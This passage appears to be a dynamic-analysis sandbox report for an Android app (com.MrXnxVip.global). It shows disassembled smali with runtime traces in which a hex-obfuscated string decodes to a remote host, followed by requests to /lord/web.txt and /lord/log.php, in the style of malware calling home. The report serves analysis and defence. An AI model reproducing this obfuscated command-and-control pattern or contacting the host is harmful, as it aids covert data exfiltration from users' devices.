                          • Return:
                            • port.txt
                        18move-result-object v1
                        20invoke-static {v0, v1}, Lanywheresoftware/b4a/objects/streams/File;->ReadString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        21move-result-object v0
                        22sput-object v0, Lcom/MrXnxVip/global/information;->_vvvv5:Ljava/lang/String;
                        23new-instance v0, Ljava/lang/StringBuilder;
                        25invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        26const/16 v1, 0x18
                        27new-array v1, v1, [B
                        28fill-array-data v1, :array_48
                        29const v2, 0xf26f1
                        31invoke-static {v1, v2}, Lcom/MrXnxVip/global/main;->vvv13([BI)Ljava/lang/String;
                        • Time: 685784
                          • This:
                            • https://ssd-vip.website/
                          • p0: [B@8d72d15
                          • p0: https://ssd-vip.website/
                          • p0: 68747470733A2F2F7373642D7669702E776562736974652F
                          • p1: SHA-1
                          • Return:
                            • https://ssd-vip.website/
                        • Time: 824370
                          • This:
                            • https://ssd-vip.website/
                          • p0: [B@8433203
                          • p0: https://ssd-vip.website/
                          • p0: 68747470733A2F2F7373642D7669702E776562736974652F
                          • p1: UTF8
                          • Return:
                            • https://ssd-vip.website/
                        32move-result-object v1
                        34invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36sget-object v1, Lcom/MrXnxVip/global/information;->_vvvv5:Ljava/lang/String;
                        38invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        40invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        41move-result-object v0
                        42sput-object v0, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        44const-string v0, ""
                        45return-object v0
                        Cross References
                        APIs
                        • java.io.File.<init>
                        • java.io.FileOutputStream.<init>
                        • java.io.BufferedOutputStream.<init>
                        • java.lang.RuntimeException.<init>
                        Strings
                        • AssetsDir
                        • /data/user/0/com.MrXnxVip.global/cache
                        • /data/user/0/com.MrXnxVip.global/files
                        • 1
                        • 2
                        • NULL.txt
                        • The Assets folder is a read-only folder
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/FileNotFoundException;
                        3}
                        4.end annotation
                        6const-string v0, "AssetsDir"
                        7if-eq p0, v0, :cond_1c
                        8new-instance v0, Lanywheresoftware/b4a/objects/streams/File$OutputStreamWrapper;
                        10invoke-direct {v0}, Lanywheresoftware/b4a/objects/streams/File$OutputStreamWrapper;-><init>()V
                        11new-instance v1, Ljava/io/BufferedOutputStream;
                        12new-instance v2, Ljava/io/FileOutputStream;
                        13new-instance v3, Ljava/io/File;
                        15invoke-direct {v3, p0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;Ljava/lang/String;)V
                        • Time: 689635
                          • This:
                            • /data/user/0/com.MrXnxVip.global/files/NULL.txt
                          • p0: /data/user/0/com.MrXnxVip.global/files
                          • p1: NULL.txt
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/files/NULL.txt
                        • Time: 700181
                          • This:
                            • /data/user/0/com.MrXnxVip.global/cache/1
                          • p0: /data/user/0/com.MrXnxVip.global/cache
                          • p1: 1
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/cache/1
                        • Time: 700508
                          • This:
                            • /data/user/0/com.MrXnxVip.global/cache/2
                          • p0: /data/user/0/com.MrXnxVip.global/cache
                          • p1: 2
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/cache/2
                        17invoke-direct {v2, v3, p2}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;Z)V
                        • Time: 689751
                          • This:
                            • java.io.FileOutputStream@d98187e
                          • p0: /data/user/0/com.MrXnxVip.global/files/NULL.txt
                          • p1: false
                          • Return:
                            • java.io.FileOutputStream@d98187e
                        • Time: 700182
                          • This:
                            • java.io.FileOutputStream@cf7cb8e
                          • p0: /data/user/0/com.MrXnxVip.global/cache/1
                          • p1: false
                          • Return:
                            • java.io.FileOutputStream@cf7cb8e
                        • Time: 700510
                          • This:
                            • java.io.FileOutputStream@5e98750
                          • p0: /data/user/0/com.MrXnxVip.global/cache/2
                          • p1: false
                          • Return:
                            • java.io.FileOutputStream@5e98750
                        19invoke-direct {v1, v2}, Ljava/io/BufferedOutputStream;-><init>(Ljava/io/OutputStream;)V
                        21invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/streams/File$OutputStreamWrapper;->setObject(Ljava/lang/Object;)V
                        22return-object v0
                        23cond_1c: new-instance p0, Ljava/lang/RuntimeException;
                        25const-string p1, "The Assets folder is a read-only folder"
                        27invoke-direct {p0, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        28throw p0
                        Cross References
                        APIs
                        Strings
                        • (Intent) Not initialized
                        • (Intent)
                        • java.lang.String@18a76d5
                        • java.lang.String@5431e83
                        • java.lang.String@62d8a20
                        • java.lang.String@6e53cd7
                        • java.lang.String@b6869e3
                        • java.lang.String@cb49aed
                        • java.lang.String@d33bc6a
                        • java.lang.String@f1389cb
                        Position Instruction Meta Information
                        0const/4 v2, 0x0
                        1const/4 v4, 0x0
                        2move-object v0, p0
                        3move-object v1, p1
                        4move-object v3, p2
                        5move-object v5, p3
                        7invoke-virtual/range {v0 .. v5}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 686132
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.starter }
                          • Return:
                            • class android.content.Intent
                            • getName: android.content.Intent
                        • Time: 686142
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@1d7d219
                          • Return:
                            • java.lang.String@18a76d5
                        • Time: 686137
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@1d7d219
                          • Return:
                            • (Intent)
                        • Time: 695762
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@d210456
                          • Return:
                            • java.lang.String@6e53cd7
                        • Time: 695863
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@c5d5c9a
                          • Return:
                            • java.lang.String@f1389cb
                        • Time: 697154
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@39ff132
                          • Return:
                            • java.lang.String@5431e83
                        • Time: 698222
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@eeac8ae
                          • Return:
                            • java.lang.String@b6869e3
                        • Time: 812049
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@5355504
                          • Return:
                            • java.lang.String@cb49aed
                        • Time: 824728
                          • This:
                            • (Intent) Not initialized
                          • Return:
                            • java.lang.Class@9fff787
                            • getName: anywheresoftware.b4a.objects.IntentWrapper
                        • Time: 824729
                          • This:
                            • @anywheresoftware.b4a.BA$ShortName(value=Intent)
                          • Return:
                            • java.lang.String@62d8a20
                        • Time: 824730
                          • This:
                            • (Intent) Not initialized
                          • Return:
                            • (Intent) Not initialized
                        • Time: 824805
                          • This:
                            • anywheresoftware.b4a.objects.IntentWrapper@4704a55
                          • Return:
                            • java.lang.String@d33bc6a
                        8move-result-object p1
                        9return-object p1
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.isEmpty
                        • java.util.List.isEmpty
                        • java.util.List.clear
                        • java.util.NoSuchElementException.<init>
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6invoke-virtual {p0}, Lokhttp3/internal/connection/RouteSelector;->hasNext()Z
                        • Time: 697760
                          • This:
                            • okhttp3.internal.connection.RouteSelector@e5f6581
                          • Return:
                            • true
                        7move-result v0
                        8if-eqz v0, :cond_6d
                        9new-instance v0, Ljava/util/ArrayList;
                        11invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        12check-cast v0, Ljava/util/List;
                        13cond_d:
                        14invoke-direct {p0}, Lokhttp3/internal/connection/RouteSelector;->hasNextProxy()Z
                        • Time: 697761
                          • This:
                            • okhttp3.internal.connection.RouteSelector@e5f6581
                          • Return:
                            • true
                        15move-result v1
                        16if-eqz v1, :cond_52
                        18invoke-direct {p0}, Lokhttp3/internal/connection/RouteSelector;->nextProxy()Ljava/net/Proxy;
                        19move-result-object v1
                        21iget-object v2, p0, Lokhttp3/internal/connection/RouteSelector;->inetSocketAddresses:Ljava/util/List;
                        23invoke-interface {v2}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        24move-result-object v2
                        25goto_1d:
                        26invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
                        27move-result v3
                        28if-eqz v3, :cond_47
                        30invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        31move-result-object v3
                        32check-cast v3, Ljava/net/InetSocketAddress;
                        33new-instance v4, Lokhttp3/Route;
                        35iget-object v5, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        37invoke-direct {v4, v5, v1, v3}, Lokhttp3/Route;-><init>(Lokhttp3/Address;Ljava/net/Proxy;Ljava/net/InetSocketAddress;)V
                        39iget-object v3, p0, Lokhttp3/internal/connection/RouteSelector;->routeDatabase:Lokhttp3/internal/connection/RouteDatabase;
                        41invoke-virtual {v3, v4}, Lokhttp3/internal/connection/RouteDatabase;->shouldPostpone(Lokhttp3/Route;)Z
                        42move-result v3
                        43if-eqz v3, :cond_40
                        45iget-object v3, p0, Lokhttp3/internal/connection/RouteSelector;->postponedRoutes:Ljava/util/List;
                        46check-cast v3, Ljava/util/Collection;
                        48invoke-interface {v3, v4}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        49goto/16 :goto_1d
                        50cond_40: move-object v3, v0
                        51check-cast v3, Ljava/util/Collection;
                        53invoke-interface {v3, v4}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        54goto/16 :goto_1d
                        55cond_47: move-object v1, v0
                        56check-cast v1, Ljava/util/Collection;
                        58invoke-interface {v1}, Ljava/util/Collection;->isEmpty()Z
                        59move-result v1
                        60xor-int/lit8 v1, v1, 0x1
                        61if-eqz v1, :cond_d
                        62cond_52:
                        63invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
                        64move-result v1
                        65if-eqz v1, :cond_67
                        66move-object v1, v0
                        67check-cast v1, Ljava/util/Collection;
                        69iget-object v2, p0, Lokhttp3/internal/connection/RouteSelector;->postponedRoutes:Ljava/util/List;
                        70check-cast v2, Ljava/lang/Iterable;
                        72invoke-static {v1, v2}, Lkotlin/collections/CollectionsKt;->addAll(Ljava/util/Collection;Ljava/lang/Iterable;)Z
                        74iget-object v1, p0, Lokhttp3/internal/connection/RouteSelector;->postponedRoutes:Ljava/util/List;
                        76invoke-interface {v1}, Ljava/util/List;->clear()V
                        77cond_67: new-instance v1, Lokhttp3/internal/connection/RouteSelector$Selection;
                        79invoke-direct {v1, v0}, Lokhttp3/internal/connection/RouteSelector$Selection;-><init>(Ljava/util/List;)V
                        80return-object v1
                        81cond_6d: new-instance v0, Ljava/util/NoSuchElementException;
                        83invoke-direct {v0}, Ljava/util/NoSuchElementException;-><init>()V
                        84check-cast v0, Ljava/lang/Throwable;
                        85goto/16 :goto_76
                        86goto_75: throw v0
                        87goto_76: goto/16 :goto_75
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • host
                        • ssd-vip.website
                        • ssd-vip.website
                        • unexpected host:
                        Position Instruction Meta Information
                        1const-string v0, "host"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4move-object v0, p0
                        5check-cast v0, Lokhttp3/HttpUrl$Builder;
                        7sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        8const/4 v3, 0x0
                        9const/4 v4, 0x0
                        10const/4 v5, 0x0
                        11const/4 v6, 0x7
                        12const/4 v7, 0x0
                        13move-object v2, p1
                        15invoke-static/range {v1 .. v7}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        16move-result-object v1
                        18invoke-static {v1}, Lokhttp3/internal/HostnamesKt;->toCanonicalHost(Ljava/lang/String;)Ljava/lang/String;
                        • Time: 697339
                          • p0: ssd-vip.website
                          • Return:
                            • ssd-vip.website
                        19move-result-object v1
                        20if-eqz v1, :cond_1d
                        21iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        22return-object v0
                        23cond_1d: new-instance v0, Ljava/lang/IllegalArgumentException;
                        24new-instance v1, Ljava/lang/StringBuilder;
                        26invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        28const-string v2, "unexpected host: "
                        30invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object p1
                        37invoke-direct {v0, p1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        38check-cast v0, Ljava/lang/Throwable;
                        39throw v0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • url
                        • /lord/log.php
                        • /lord/web.txt
                        Position Instruction Meta Information
                        1const-string v0, "url"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        5invoke-virtual {p1}, Lokhttp3/HttpUrl;->encodedPath()Ljava/lang/String;
                        • Time: 699276
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • /lord/web.txt
                        • Time: 699322
                          • This:
                            • https://ssd-vip.website/lord/log.php
                          • Return:
                            • /lord/log.php
                        6move-result-object v0
                        8invoke-virtual {p1}, Lokhttp3/HttpUrl;->encodedQuery()Ljava/lang/String;
                        • Time: 699276
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • null
                        9move-result-object p1
                        10if-eqz p1, :cond_23
                        11new-instance v1, Ljava/lang/StringBuilder;
                        13invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        15invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16const/16 v0, 0x3f
                        18invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        20invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        22invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        23move-result-object v0
                        24cond_23: return-object v0
                        Cross References
                        APIs
                        Strings
                        • java.lang.String@2f69668
                        • java.lang.String@3626f9b
                        • java.lang.String@6108d62
                        • java.lang.String@a22d415
                        • java.lang.String@a4cb35b
                        • java.lang.String@c29cdef
                        • java.lang.String@c8bd0f2
                        • java.lang.String@f369465
                        • lord
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5new-instance v0, Lanywheresoftware/b4a/objects/collections/List;
                        7invoke-direct {v0}, Lanywheresoftware/b4a/objects/collections/List;-><init>()V
                        9invoke-virtual {v0}, Lanywheresoftware/b4a/objects/collections/List;->Initialize()V
                        10goto_8:
                        11invoke-virtual {p0}, Lanywheresoftware/b4a/objects/streams/File$TextReaderWrapper;->ReadLine()Ljava/lang/String;
                        • Time: 695488
                          • This:
                            • java.io.BufferedReader@901e7d0
                          • Return:
                            • java.lang.Class@e39a459
                            • getName: java.io.BufferedReader
                        • Time: 695490
                          • This:
                            • (BufferedReader) java.io.BufferedReader@901e7d0
                          • Return:
                            • java.lang.String@c29cdef
                        • Time: 695484
                          • This:
                            • (BufferedReader) java.io.BufferedReader@901e7d0
                          • Return:
                            • lord
                        • Time: 695495
                          • This:
                            • (BufferedReader) java.io.BufferedReader@901e7d0
                          • Return:
                            • null
                        • Time: 696192
                          • This:
                            • (BufferedReader) java.io.BufferedReader@45ab457
                          • Return:
                            • java.lang.String@6108d62
                        • Time: 696504
                          • This:
                            • (BufferedReader) java.io.BufferedReader@3c7c70c
                          • Return:
                            • java.lang.String@a4cb35b
                        • Time: 812233
                          • This:
                            • (BufferedReader) java.io.BufferedReader@786f42e
                          • Return:
                            • java.lang.String@f369465
                        • Time: 812293
                          • This:
                            • (BufferedReader) java.io.BufferedReader@eb3b3a7
                          • Return:
                            • java.lang.String@c8bd0f2
                        • Time: 812499
                          • This:
                            • (BufferedReader) java.io.BufferedReader@337bc20
                          • Return:
                            • java.lang.String@3626f9b
                        • Time: 812525
                          • This:
                            • (BufferedReader) java.io.BufferedReader@58d2305
                          • Return:
                            • java.lang.String@2f69668
                        • Time: 824888
                          • This:
                            • java.io.BufferedReader@9b0b31e
                          • Return:
                            • java.lang.Class@3038a26
                            • getName: java.io.BufferedReader
                        • Time: 824889
                          • This:
                            • (BufferedReader) java.io.BufferedReader@9b0b31e
                          • Return:
                            • java.lang.String@a22d415
                        12move-result-object v1
                        13if-nez v1, :cond_12
                        15invoke-virtual {p0}, Lanywheresoftware/b4a/objects/streams/File$TextReaderWrapper;->Close()V
                        16return-object v0
                        17cond_12:
                        18invoke-virtual {v0, v1}, Lanywheresoftware/b4a/objects/collections/List;->Add(Ljava/lang/Object;)V
                        19goto/16 :goto_8
                        Cross References
                        APIs
                        • java.net.URI.<init>
                        • java.net.URI.create
                        • java.lang.RuntimeException.<init>
                        Strings
                        • https://ssd-vip.website/
                        • https://ssd-vip.website/lord/log.php
                        • https://ssd-vip.website/lord/web.txt
                        • [\\u0000-\\u001F\\u007F-\\u009F\\p{javaWhitespace}]
                        • try {\n val stripp\u2026e) // Unexpected!\n }
                        Position Instruction Meta Information
                        1invoke-virtual {p0}, Lokhttp3/HttpUrl;->newBuilder()Lokhttp3/HttpUrl$Builder;
                        2move-result-object v0
                        4invoke-virtual {v0}, Lokhttp3/HttpUrl$Builder;->reencodeForUri$okhttp()Lokhttp3/HttpUrl$Builder;
                        5move-result-object v0
                        7invoke-virtual {v0}, Lokhttp3/HttpUrl$Builder;->toString()Ljava/lang/String;
                        • Time: 697448
                          • This:
                            • https:///
                          • Return:
                            • https://ssd-vip.website/lord/web.txt
                        • Time: 697743
                          • This:
                            • https:///
                          • Return:
                            • https://ssd-vip.website/
                        • Time: 698273
                          • This:
                            • https:///
                          • Return:
                            • https://ssd-vip.website/lord/log.php
                        8move-result-object v0
                        9try_start_c: new-instance v1, Ljava/net/URI;
                        11invoke-direct {v1, v0}, Ljava/net/URI;-><init>(Ljava/lang/String;)V
                        12try_end_11: goto/16 :goto_2b
                        13catch_12: move-exception v1
                        14try_start_13: check-cast v0, Ljava/lang/CharSequence;
                        15new-instance v2, Lkotlin/text/Regex;
                        17const-string v3, "[\\u0000-\\u001F\\u007F-\\u009F\\p{javaWhitespace}]"
                        19invoke-direct {v2, v3}, Lkotlin/text/Regex;-><init>(Ljava/lang/String;)V
                        21const-string v3, ""
                        23invoke-virtual {v2, v0, v3}, Lkotlin/text/Regex;->replace(Ljava/lang/CharSequence;Ljava/lang/String;)Ljava/lang/String;
                        24move-result-object v0
                        26invoke-static {v0}, Ljava/net/URI;->create(Ljava/lang/String;)Ljava/net/URI;
                        27move-result-object v1
                        28try_end_26:
                        29const-string v0, "try {\n val stripp\u2026e) // Unexpected!\n }"
                        31invoke-static {v1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        32goto_2b: return-object v1
                        33catch_2c: new-instance v0, Ljava/lang/RuntimeException;
                        34check-cast v1, Ljava/lang/Throwable;
                        36invoke-direct {v0, v1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        37check-cast v0, Ljava/lang/Throwable;
                        38throw v0
                        Cross References
                        APIs
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.io.IOException.<init>
                        • java.io.IOException.<init>
                        Strings
                        • Check failed.
                        • Canceled
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5move-object v1, p0
                        7iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        9invoke-virtual {v0}, Lokhttp3/internal/connection/RealCall;->isCanceled()Z
                        • Time: 697653
                          • This:
                            • okhttp3.internal.connection.RealCall@a6f051
                          • Return:
                            • false
                        10move-result v0
                        11if-nez v0, :cond_1a6
                        13iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        15invoke-virtual {v0}, Lokhttp3/internal/connection/RealCall;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        16move-result-object v2
                        17const/4 v0, 0x1
                        18const/4 v3, 0x0
                        19const/4 v4, 0x0
                        20if-eqz v2, :cond_6a
                        21move-object v5, v4
                        22check-cast v5, Ljava/net/Socket;
                        23monitor-enter v2
                        24try_start_18:
                        25invoke-virtual {v2}, Lokhttp3/internal/connection/RealConnection;->getNoNewExchanges()Z
                        26move-result v6
                        27if-nez v6, :cond_30
                        29invoke-virtual {v2}, Lokhttp3/internal/connection/RealConnection;->route()Lokhttp3/Route;
                        30move-result-object v6
                        32invoke-virtual {v6}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        33move-result-object v6
                        35invoke-virtual {v6}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        36move-result-object v6
                        38invoke-virtual {p0, v6}, Lokhttp3/internal/connection/ExchangeFinder;->sameHostAndPort(Lokhttp3/HttpUrl;)Z
                        39move-result v6
                        40if-nez v6, :cond_36
                        41cond_30:
                        42iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        44invoke-virtual {v5}, Lokhttp3/internal/connection/RealCall;->releaseConnectionNoEvents$okhttp()Ljava/net/Socket;
                        45move-result-object v5
                        46cond_36:
                        47sget-object v6, Lkotlin/Unit;->INSTANCE:Lkotlin/Unit;
                        48try_end_38: monitor-exit v2
                        50iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        52invoke-virtual {v6}, Lokhttp3/internal/connection/RealCall;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        53move-result-object v6
                        54if-eqz v6, :cond_56
                        55if-nez v5, :cond_44
                        56goto/16 :goto_45
                        57cond_44: const/4 v0, 0x0
                        58goto_45: if-eqz v0, :cond_48
                        59return-object v2
                        60cond_48: new-instance v0, Ljava/lang/IllegalStateException;
                        62const-string v2, "Check failed."
                        64invoke-virtual {v2}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        65move-result-object v2
                        67invoke-direct {v0, v2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        68check-cast v0, Ljava/lang/Throwable;
                        69throw v0
                        70cond_56: if-eqz v5, :cond_5b
                        72invoke-static {v5}, Lokhttp3/internal/Util;->closeQuietly(Ljava/net/Socket;)V
                        73cond_5b:
                        74iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        76iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        77check-cast v6, Lokhttp3/Call;
                        78check-cast v2, Lokhttp3/Connection;
                        80invoke-virtual {v5, v6, v2}, Lokhttp3/EventListener;->connectionReleased(Lokhttp3/Call;Lokhttp3/Connection;)V
                        81goto/16 :goto_6a
                        82catchall_67: move-exception v0
                        83monitor-exit v2
                        84throw v0
                        85goto_6a: iput v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->refusedStreamCount:I
                        86iput v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionShutdownCount:I
                        87iput v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->otherFailureCount:I
                        89iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->connectionPool:Lokhttp3/internal/connection/RealConnectionPool;
                        91iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->address:Lokhttp3/Address;
                        93iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        95invoke-virtual {v2, v5, v6, v4, v3}, Lokhttp3/internal/connection/RealConnectionPool;->callAcquirePooledConnection(Lokhttp3/Address;Lokhttp3/internal/connection/RealCall;Ljava/util/List;Z)Z
                        96move-result v2
                        97if-eqz v2, :cond_92
                        99iget-object v0, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        101invoke-virtual {v0}, Lokhttp3/internal/connection/RealCall;->getConnection()Lokhttp3/internal/connection/RealConnection;
                        102move-result-object v0
                        104invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        106iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        108iget-object v3, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        109check-cast v3, Lokhttp3/Call;
                        110move-object v4, v0
                        111check-cast v4, Lokhttp3/Connection;
                        113invoke-virtual {v2, v3, v4}, Lokhttp3/EventListener;->connectionAcquired(Lokhttp3/Call;Lokhttp3/Connection;)V
                        114return-object v0
                        115cond_92:
                        116iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->nextRouteToTry:Lokhttp3/Route;
                        117if-eqz v2, :cond_a2
                        118move-object v3, v4
                        119check-cast v3, Ljava/util/List;
                        121invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        122move-object v5, v4
                        123check-cast v5, Lokhttp3/Route;
                        124iput-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->nextRouteToTry:Lokhttp3/Route;
                        125goto/16 :goto_112
                        126cond_a2:
                        127iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->routeSelection:Lokhttp3/internal/connection/RouteSelector$Selection;
                        128if-eqz v2, :cond_bc
                        130invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        132invoke-virtual {v2}, Lokhttp3/internal/connection/RouteSelector$Selection;->hasNext()Z
                        133move-result v2
                        134if-eqz v2, :cond_bc
                        135move-object v3, v4
                        136check-cast v3, Ljava/util/List;
                        138iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->routeSelection:Lokhttp3/internal/connection/RouteSelector$Selection;
                        140invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        142invoke-virtual {v2}, Lokhttp3/internal/connection/RouteSelector$Selection;->next()Lokhttp3/Route;
                        143move-result-object v2
                        144goto/16 :goto_112
                        145cond_bc:
                        146iget-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->routeSelector:Lokhttp3/internal/connection/RouteSelector;
                        147if-nez v2, :cond_d9
                        148new-instance v2, Lokhttp3/internal/connection/RouteSelector;
                        150iget-object v5, v1, Lokhttp3/internal/connection/ExchangeFinder;->address:Lokhttp3/Address;
                        152iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        154invoke-virtual {v6}, Lokhttp3/internal/connection/RealCall;->getClient()Lokhttp3/OkHttpClient;
                        155move-result-object v6
                        157invoke-virtual {v6}, Lokhttp3/OkHttpClient;->getRouteDatabase()Lokhttp3/internal/connection/RouteDatabase;
                        158move-result-object v6
                        160iget-object v7, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        161check-cast v7, Lokhttp3/Call;
                        163iget-object v8, v1, Lokhttp3/internal/connection/ExchangeFinder;->eventListener:Lokhttp3/EventListener;
                        165invoke-direct {v2, v5, v6, v7, v8}, Lokhttp3/internal/connection/RouteSelector;-><init>(Lokhttp3/Address;Lokhttp3/internal/connection/RouteDatabase;Lokhttp3/Call;Lokhttp3/EventListener;)V
                        166iput-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->routeSelector:Lokhttp3/internal/connection/RouteSelector;
                        167cond_d9:
                        168invoke-virtual {v2}, Lokhttp3/internal/connection/RouteSelector;->next()Lokhttp3/internal/connection/RouteSelector$Selection;
                        169move-result-object v2
                        170iput-object v2, v1, Lokhttp3/internal/connection/ExchangeFinder;->routeSelection:Lokhttp3/internal/connection/RouteSelector$Selection;
                        172invoke-virtual {v2}, Lokhttp3/internal/connection/RouteSelector$Selection;->getRoutes()Ljava/util/List;
                        173move-result-object v5
                        175iget-object v6, v1, Lokhttp3/internal/connection/ExchangeFinder;->call:Lokhttp3/internal/connection/RealCall;
                        177invoke-virtual {v6}, Lokhttp3/internal/connection/RealCall;->isCanceled()Z
                        • Time: 697993
